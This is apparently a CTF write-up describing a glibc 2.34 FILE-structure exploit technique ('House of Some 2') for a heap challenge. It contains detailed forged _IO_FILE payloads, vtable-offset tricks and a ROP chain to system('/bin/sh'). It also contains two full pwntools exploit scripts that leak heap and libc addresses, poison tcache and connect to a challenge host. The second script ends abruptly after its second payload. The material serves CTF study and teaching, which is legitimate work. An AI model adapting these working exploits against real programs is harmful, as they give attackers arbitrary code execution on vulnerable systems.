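PS: _wide_data could also be pointed at a forged struct _IO_wide_data right here, but that needs a longer arbitrary write. The 0x100 in this challenge isn't enough, and it can be written in the next step anyway, so there is little point.

Finally, when _IO_file_underflow calls read, _fileno must be 0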

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);

The write target is _IO_2_1_stdout_, so _IO_buf_base points to _IO_2_1_stdout_.

The write length is the size of _IO_2_1_stdout_ plus a struct _IO_wide_data, i.e. 0x1c8 (0xe0 + 0xe8), so _IO_buf_end is set to _IO_buf_base + 0x1c8.

Reference payload

payload1 = flat({
0x00: 0x8000, # _IO_USER_LOCK > disable lock
0x38: libc_stdout, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
# size of _IO_FILE_plus + _IO_wide_data
0x70: 0, # _fileno > read fd, stdin
0xa0: libc_stdout + 0x100, # _wide_data > writable address,
# or corrupt in fileops.c:717,
# decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
0xc0: 0, # _mode <= 0
0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable
}, filler=b"\x00")

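Part.2 First loop

The payload controlling the first loop is sent through the read at the entry; here is what goes in it.

Assuming there is a canary as above, the goal of the first loop is to run _IO_default_xsputn.

First, a problem with the challenge's original libc. Recall that every call through vtable goes through an IO_validate_vtable check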

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}
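The fast path of this check is just an unsigned range test, which can be modelled in a few lines of Python. The section bounds below are made-up numbers; only the comparison logic mirrors the C code above.

```python
MASK64 = (1 << 64) - 1  # emulate uintptr_t wrap-around on 64-bit


def vtable_in_section(vtable, start, stop):
    """True if the fast path accepts `vtable`, i.e. _IO_vtable_check is not called."""
    section_length = stop - start
    offset = (vtable - start) & MASK64   # unsigned subtraction, like the C code
    return offset < section_length


start, stop = 0x1000, 0x2000             # hypothetical __libc_IO_vtables bounds
table = 0x1500                           # hypothetical table inside the section
print(vtable_in_section(table - 0x18, start, stop))  # shifted pointer, still inside
print(vtable_in_section(start - 8, start, stop))     # just below the section
```

This is why a vtable pointer shifted by a few slots is accepted as long as it stays within the section, while a pointer just below the section start wraps to a huge offset and is rejected.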

One of its steps is

uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables

When I compiled libc myself with optimization at O2 or lower, the assembly for this statement was always

lea    rdx, [rip + 0x170dd8]

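So rdx is overwritten with a libc address, and the later _IO_default_xsputn or read goes wrong.

Judging by the offsets, the challenge's libc is probably built at O2; at least the offsets match my own O2 build.

So House of Some 2 can't be used against it.

Below I use my own O3 build of libc as the example (the file is given above; I can't get hold of any other libc anyway).

PS: building with Ofast failed and I couldn't be bothered to sort it out, so I bailed.

The O3 libc has no such instruction, so IO_validate_vtable does not affect rdx.

However, after _IO_SYSREAD, at roughly this point in _IO_new_file_underflow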

fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);

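At this spot there is an instruction that loads the value of _offset into rdx.

This differs from the pure House of Some 2, but at least rdx is controllable.

PS: if you only care about the pure version, you can skip the rest; it's different.

With these differences known, on to how the payload is written.

First work out the memory layout. The rdx set above is the length of the rop chain plus the offset from &st to the return address. After some debugging, the return address of _IO_file_underflow_maybe_mmap is 0xb8 after &st.

Following @CSOME, I copy &st to just above _IO_2_1_stdout_ (at lower addresses), so that when I modify the stack copy I can modify _IO_2_1_stdout_ in the same write. So _IO_2_1_stdout_ follows immediately, and its size is 0xe0, the size of struct _IO_FILE_plus.

Then I also need to forge _IO_2_1_stdout_.file._wide_data, a struct _IO_wide_data of size 0xe8. I copied this part directly too, placing it right after _IO_2_1_stdout_.

PS: for _wide_data only the final _wide_vtable really needs to be written, which would save some space, but since the read size isn't limited here I just copied what I could.

So the memory layout I want is roughly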

- count        : copied from &st
- (count-0xb8) : retn
0x00 : _IO_2_1_stdout_
+ 0xe0 : fake _IO_wide_data structure
+ 0x1c8 : end

Then look at _IO_default_xsputn. At the end of the function this has to be bypassed

if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)

Per the earlier analysis this needs

count = _IO_write_end - _IO_write_ptr = rdx

What I want _IO_default_xsputn to execute is

mempcpy(_IO_write_ptr, &st, _IO_write_end - _IO_write_ptr)

which must copy rdx bytes to &_IO_2_1_stdout_ - rdx, so

_offset       = rdx
_IO_write_ptr = &_IO_2_1_stdout_ - rdx
_IO_write_end = _IO_write_ptr + rdx
= &_IO_2_1_stdout_

As for _wide_data, just set its _wide_vtable to libc_IO_wfile_jumps_maybe_mmap; the other fields don't seem to matter.

The rest is much like the entry payload.

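Note that the address I read into is the retn position, i.e. where the return address of _IO_file_underflow_maybe_mmap sits in the copy, which is &_IO_2_1_stdout_ - rdx + 0xb8. The read has to cover the rest of the stack copy (rdx - 0xb8 bytes) plus the 0x1c8 bytes of stdout, so its size is 0x1c8 + (rdx - 0xb8), i.e.

_IO_buf_base = &_IO_2_1_stdout_ - rdx + 0xb8
_IO_buf_end = _IO_buf_base + 0x1c8 + (rdx - 0xb8)
= &_IO_2_1_stdout_ + 0x1c8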
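The pointer arithmetic for this loop is easy to get wrong, so here is a small sketch that derives all four pointers from the address of stdout and the rop length. The constants 0xb8 and 0x1c8 come from this post; the function name and the sample stdout address are hypothetical.

```python
RET_OFFSET = 0xb8     # &st -> return address of _IO_file_underflow_maybe_mmap
STDOUT_SPAN = 0x1c8   # 0xe0 (_IO_FILE_plus) + 0xe8 (_IO_wide_data)


def first_loop_layout(stdout_addr, rop_len):
    """Pointers for the first loop, with the stack copy placed right before stdout."""
    rdx = RET_OFFSET + rop_len
    write_ptr = stdout_addr - rdx
    return {
        "rdx": rdx,                                 # also stored in _offset for the O3 build
        "_IO_write_ptr": write_ptr,                 # mempcpy destination
        "_IO_write_end": stdout_addr,               # write_end - write_ptr == rdx
        "_IO_buf_base": write_ptr + RET_OFFSET,     # next read starts at retn
        "_IO_buf_end": stdout_addr + STDOUT_SPAN,   # and runs to the end of the fake wide data
    }


layout = first_loop_layout(0x7f0000001000, 5 * 8)   # made-up stdout address, 5-word rop
print({k: hex(v) for k, v in layout.items()})
```

With a 5-word rop chain this gives rdx = 0xe0 and a read size of 0x1c8 + 0x28 = 0x1f0.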

Reference payload

offset_retn = 0xb8  # retn of _IO_file_underflow_maybe_mmap
rop = [... ...]
rdx = offset_retn + len(rop) * 8
payload2 = flat({
0x08: libc_stdout, # _IO_read_ptr > readable address,
# or crash in fileops:537,
# return *(unsigned char *) fp->_IO_read_ptr;
0x28: libc_stdout - rdx, # _IO_write_ptr > memcpy dest
0x30: libc_stdout, # _IO_write_end > memcpy n = rdx
0x38: libc_stdout - rdx + offset_retn, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > memcpy n and read nbytes,
# size of stack + stdout(_IO_FILE_plus + _IO_wide_data)
0x70: 0, # _fileno > read fd, stdin
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode <= 0
0xd8: libc_IO_default_xsputn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}, filler=b"\x00")

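Part.3 Second loop

The payload controlling the second loop is sent through the read at the end of the first loop; its purpose is to run _IO_default_xsgetn.

Note that once this payload has been sent, running _IO_default_xsgetn copies things back onto the stack, so the rop chain has to be written as part of this payload.

Recall the memory layout I stacked up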

- rdx        : copied from &st
- (rdx-0xb8) : retn <= payload start
0x00 : _IO_2_1_stdout_
+ 0xe0 : fake _IO_wide_data structure
+ 0x1c8 : end

The payload is written starting at retn, so the first (rdx-0xb8) bytes of the payload are my rop chain.

The rest is much like Part.2, except that what runs is

mempcpy(&st, _IO_read_ptr, _IO_read_end - _IO_read_ptr)

and what has to be bypassed is

count = _IO_read_end - _IO_read_ptr = rdx

so what needs to be set is

_offset      = rdx
_IO_read_ptr = &_IO_2_1_stdout_ - rdx
_IO_read_end = _IO_read_ptr + rdx
= &_IO_2_1_stdout_

Also, since the later _IO_SYSREAD is never reached, _IO_buf_base and _IO_buf_end are no longer needed.

Reference payload

payload3 = flat({
0x00: rop, # retn
rdx - offset_retn: {
0x08: libc_stdout - rdx, # _IO_read_ptr > memcpy src
0x10: libc_stdout, # _IO_read_end > memcpy n = rdx
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode <= 0
0xd8: libc_IO_default_xsgetn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}
}, filler=b"\x00")

Part.4 rop

The final rop chain is routine.

In theory my rop chain is simply

pop rdi
pointer to '/bin/sh\x00'
libc_system

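But stacked this way, there is a fault inside do_system.

Roughly, an xmmword instruction needs the address of its memory operand to be 16-byte aligned (an xmmword is 16 bytes), and since the stack has been modified by me, the stack address there is not aligned.

The fix is to put a ret at the front of the rop chain, which shifts the address used by the xmmword instruction by 8.

So the final rop chain is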

0x00: ret
0x08: pop rdi
0x10: pointer to 0x20
0x18: libc_system
0x20: '/bin/sh\x00'
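As a sketch, the same chain can be packed with nothing but the standard library. The gadget and function addresses are placeholders passed in by the caller, and chain_addr stands for the address at which the first word of the chain can be read when system dereferences the string pointer; the helper name is made up.

```python
import struct


def build_rop(ret, pop_rdi, system, chain_addr):
    """Pack the 5-word chain: ret (alignment), pop rdi, &"/bin/sh", system, "/bin/sh"."""
    words = [
        ret,                # extra ret so the stack is 16-byte aligned inside do_system
        pop_rdi,
        chain_addr + 0x20,  # pointer to the string stored at offset 0x20 of the chain
        system,
    ]
    return struct.pack("<4Q", *words) + b"/bin/sh\x00"


# All four values below are placeholders, not real addresses.
chain = build_rop(ret=0x1111, pop_rdi=0x2222, system=0x3333, chain_addr=0x7000)
print(len(chain))
```

The chain is 0x28 bytes long, which is the rop length that goes into the rdx calculation.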

Reference Exp

Attacking O3

Following the flow above, the exp is:

from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
    env = {'LD_LIBRARY_PATH': '.'}
    r = process('./pwn', env=env)
    if AUTOGDB:
        gid, g = gdb.attach(r, api=True, gdbscript='')
        sleep(1)
        AUTOGDB and g.execute('dir ./src') and sleep(T)
        AUTOGDB and g.execute('c') and sleep(T)
    else:
        gdb.attach(r, gdbscript='dir ./src')
        input('Waiting GDB...')
else:
    AUTOGDB = False
    r = remote('node4.anna.nssctf.cn', 28144)

def add():
    r.sendlineafter(b'Choice: ', b'1')
    sleep(T)

def delete(idx):
    r.sendlineafter(b'Choice: ', b'2')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    sleep(T)

def show(idx):
    r.sendlineafter(b'Choice: ', b'3')
    r.sendlineafter(b'Idx: \n', str(idx).encode())
    return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
    r.sendlineafter(b'Choice: ', b'4')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    #r.sendlineafter(b'Size: ', str(size).encode())
    r.sendlineafter(b'Size: ', str(len(content)).encode())
    r.sendafter(b'Content: ', content)
    sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

def PROTECT_PTR(ptr):
    return (heap_base >> 12) ^ ptr

edit(0, '0' * 8)
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
    add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
    delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
    libc = ELF('libc-2.34-debug-O3.so')
else:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
    libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']

# copied from @Csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
    0x00: 0x8000, # _flags: _IO_USER_LOCK > disable lock
    0x38: libc_stdout, # _IO_buf_base > read buf
    0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
                               # size of _IO_FILE_plus + _IO_wide_data
    0x70: 0, # _fileno > read fd, stdin
    0xa0: libc_stdout + 0x100, # _wide_data > must be a writable address,
                               # otherwise it crashes at fileops.c:717,
                               # decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
    0xc0: 0, # _mode <= 0
    0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable: __xsputn slot (0x38) > __underflow (0x20)
}, filler=b"\x00")
payload1 = flat([0, 0], filler=b"\x00") + payload1 # stderr._unused2 and stderr.vtable

#AUTOGDB and g.execute('b fileops.c:717') and sleep(T)
#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)


libc_IO_str_jumps = libc.symbols['_IO_str_jumps']
libc_IO_default_xsputn = libc_IO_str_jumps + 0x38
libc_IO_default_xsgetn = libc_IO_str_jumps + 0x40

O = 3
if O == 3:
    # gadget offsets of the -O3 debug build
    libc_pop_rdi = libc_base + 0x2dc12
    libc_ret = libc_base + 0x2c718
libc_system = libc.symbols['system']
offset_retn = 0xb8 # retn of _IO_file_underflow_maybe_mmap
rop = [
libc_ret, # align to 16 bytes in do_system+338
libc_pop_rdi, libc_stdout - 0x1c8 + offset_retn + 0x8 * 4,
libc_system,
u64(b'/bin/sh\x00')
]
# 0x1c8 > _IO_FILE_plus + _IO_wide_data
#rdx = offset_retn + 0x1c8 # real House of Some 2
rdx = offset_retn + len(rop) * 8

# mempcpy(stdout->_IO_write_ptr, &st, stdout->_IO_buf_end - stdout->_IO_buf_base)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload2 = flat({
    0x08: libc_stdout, # _IO_read_ptr > must be a readable address,
                       # otherwise it crashes at fileops.c:537,
                       # return *(unsigned char *) fp->_IO_read_ptr;
    0x28: libc_stdout - rdx, # _IO_write_ptr > memcpy dest
    0x30: libc_stdout, # _IO_write_end > memcpy n = rdx
    0x38: libc_stdout - rdx + offset_retn, # _IO_buf_base > read buf
    0x40: libc_stdout + 0x1c8, # _IO_buf_end > memcpy n and read nbytes,
                               # size of stack + stdout(_IO_FILE_plus + _IO_wide_data)
    0x70: 0, # _fileno > read fd, stdin
    0x90: rdx, # _offset > rdx for O3
    0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
    0xc0: 0, # _mode <= 0
    0xd8: libc_IO_default_xsputn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
    0xe0: {
        0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
    }
}, filler=b"\x00")
#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x95a04)}') and sleep(T) # memcpy in xsputn
r.send(payload2)

# mempcpy(&st, stdout->_IO_read_ptr, stdout->_IO_buf_end - stdout->_IO_buf_base)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload3 = flat({
    #0x00: 0xdeadbeaf, # retn
    0x00: rop, # retn
    rdx - offset_retn: {
        0x08: libc_stdout - rdx, # _IO_read_ptr > memcpy src
        0x10: libc_stdout, # _IO_read_end > memcpy n = rdx
        0x90: rdx, # _offset > rdx for O3
        0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
        0xc0: 0, # _mode <= 0
        0xd8: libc_IO_default_xsgetn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
        0xe0: {
            0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
        }
    }
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x95c79)}') and sleep(T) # memcpy in xsgetn
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system
r.send(payload3)

r.interactive()
r.close()
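
The heap part of the exp above relies on glibc's safe-linking: since 2.32, a tcache `next` pointer is stored XORed with the address of the field holding it, shifted right by 12. The sketch below is not part of the original exp; it only replays that arithmetic in plain Python. The addresses are made-up example values, and `protect_ptr` / `reveal_ptr` are illustrative names mirroring glibc's `PROTECT_PTR` / `REVEAL_PTR` macros.

```python
# Minimal sketch of glibc >= 2.32 safe-linking (illustrative, stdlib only).
# All addresses are made-up example values, not taken from the challenge.

def protect_ptr(pos: int, ptr: int) -> int:
    """Value stored in a tcache next field that lives at address pos."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, stored: int) -> int:
    """Inverse of protect_ptr: recover the real pointer."""
    return (pos >> 12) ^ stored

heap_base = 0x55555555b000   # hypothetical page-aligned heap base
chunk = heap_base + 0x2a0    # hypothetical first freed tcache chunk
target = 0x7ffff7fa5770      # hypothetical 16-byte-aligned target

# The first freed chunk has next == NULL, so the stored value is just pos >> 12.
leak = protect_ptr(chunk, 0)
recovered_base = leak << 12

# Tcache poisoning: the value to write so that a later malloc returns target.
poisoned = protect_ptr(chunk, target)
```

The exp's `PROTECT_PTR` uses `heap_base >> 12` instead of the chunk address. That gives the same result only while the edited chunk lies in the same 4 KiB page as `heap_base`.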

No canary·

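Depending on how libc was compiled, some of its functions may have no stack canary.

Without a canary, the _IO_SYSSTAT call in the first loop iteration can be pointed at _IO_file_read, which reads attacker input straight into the on-stack &st and overflows the stack directly.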
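
Pointing _IO_SYSSTAT at _IO_file_read means choosing a vtable value whose `__stat` slot overlaps the `__read` slot of the real `_IO_file_jumps`. The sketch below computes that shifted pointer in plain Python. The field order is that of `struct _IO_jump_t` with 8-byte slots on x86-64; `shifted_vtable` is a hypothetical helper name and the table address is a made-up example value.

```python
# Field order of struct _IO_jump_t; each slot is 8 bytes on x86-64.
JUMP_FIELDS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]
OFFSET = {name: 8 * i for i, name in enumerate(JUMP_FIELDS)}

def shifted_vtable(table_addr: int, wanted: str, called: str) -> int:
    """vtable value that makes the `called` slot resolve to the
    `wanted` entry of the real jump table located at table_addr."""
    return table_addr + OFFSET[wanted] - OFFSET[called]

io_file_jumps = 0x7ffff7fa0600  # hypothetical address of _IO_file_jumps

# _IO_SYSSTAT (slot __stat) should end up calling _IO_file_read (slot __read).
fake_vtable = shifted_vtable(io_file_jumps, "__read", "__stat")
```

This matches the expression `libc_IO_file_jumps + 0x70 - 0x90` in the reference exp. The same helper reproduces the entry vtable `_IO_wfile_jumps_maybe_mmap - 0x18` (wanted `__underflow`, called `__xsputn`).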

The call chain is:

// entrance
_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_file_read (stdout, &st, rdx)
==========> read(0, &st, rdx) // read rop to &st
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> // set n=0 in read and pass
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
====> // return to rop
==> rop

Reference exp:

from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
    env = {'LD_LIBRARY_PATH': '.'}
    r = process('./pwn', env=env)
    if AUTOGDB:
        gid, g = gdb.attach(r, api=True, gdbscript='')
        sleep(1)
        AUTOGDB and g.execute('dir ./src') and sleep(T)
        AUTOGDB and g.execute('c') and sleep(T)
    else:
        gdb.attach(r, gdbscript='dir ./src')
        input('Waiting GDB...')
else:
    AUTOGDB = False
    r = remote('node4.anna.nssctf.cn', 28144)

def add():
    r.sendlineafter(b'Choice: ', b'1')
    sleep(T)

def delete(idx):
    r.sendlineafter(b'Choice: ', b'2')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    sleep(T)

def show(idx):
    r.sendlineafter(b'Choice: ', b'3')
    r.sendlineafter(b'Idx: \n', str(idx).encode())
    return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
    r.sendlineafter(b'Choice: ', b'4')
    r.sendlineafter(b'Idx: ', str(idx).encode())
    #r.sendlineafter(b'Size: ', str(size).encode())
    r.sendlineafter(b'Size: ', str(len(content)).encode())
    r.sendafter(b'Content: ', content)
    sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

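def PROTECT_PTR(ptr):
    # safe-linking: tcache next pointers are stored XORed with (chunk address >> 12)
    return (heap_base >> 12) ^ ptr

edit(0, b'0' * 8) # fill the next field so show() also prints the tcache key behind it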
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
    add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
    delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
    libc = ELF('libc-2.34-debug-O3.so')
else:
    libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
    libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']

# copied from @Csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
    0x00: 0x8000, # _flags: _IO_USER_LOCK > disable lock
    0x38: libc_stdout, # _IO_buf_base > read buf
    0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
                               # size of _IO_FILE_plus + _IO_wide_data
    0x70: 0, # _fileno > read fd, stdin
    0xa0: libc_stdout + 0x100, # _wide_data > must be a writable address,
                               # otherwise it crashes at fileops.c:717,
                               # decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
    0xc0: 0, # _mode <= 0
    0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable: __xsputn slot (0x38) > __underflow (0x20)
}, filler=b"\x00")
payload1 = flat([0, 0], filler=b"\x00") + payload1 # stderr._unused2 and stderr.vtable

#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)


libc_IO_file_jumps = libc.symbols['_IO_file_jumps']
libc_IO_file_read = libc_IO_file_jumps + 0x70

O = 3
if O == 3:
    # gadget offsets of the -O3 debug build
    libc_pop_rdi = libc_base + 0x2dc12
    libc_ret = libc_base + 0x2c718
libc_system = libc.symbols['system']
libc_sh = next(libc.search(b'/bin/sh'))

offset_retn = 0xb8 # retn from _IO_file_underflow_maybe_mmap to _IO_wfile_underflow_maybe_mmap
rop = [
    libc_ret, # align to 16 bytes in do_system+338
    libc_pop_rdi, libc_sh,
    libc_system,
]
# pad from &st up to the saved return address, then append the chain
rop = flat([0] * (offset_retn // 8) + rop, filler=b"\x00")
rdx = len(rop)

# read(stdout->_fileno, &st, rdx)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload2 = flat({
    0x08: libc_stdout, # _IO_read_ptr > must be a readable address,
                       # otherwise it crashes at fileops.c:537,
                       # return *(unsigned char *) fp->_IO_read_ptr;
    0x38: libc_stdout, # _IO_buf_base
    0x40: libc_stdout, # _IO_buf_end > read n = 0,
    0x70: 0, # _fileno > read fd, stdin
    0x90: rdx, # _offset > rdx for O3
    0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
    0xc0: 0, # _mode <= 0
    0xd8: libc_IO_file_read - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
    0xe0: {
        0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
    }
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x93631)}') and sleep(T) # read
r.send(payload2)

AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
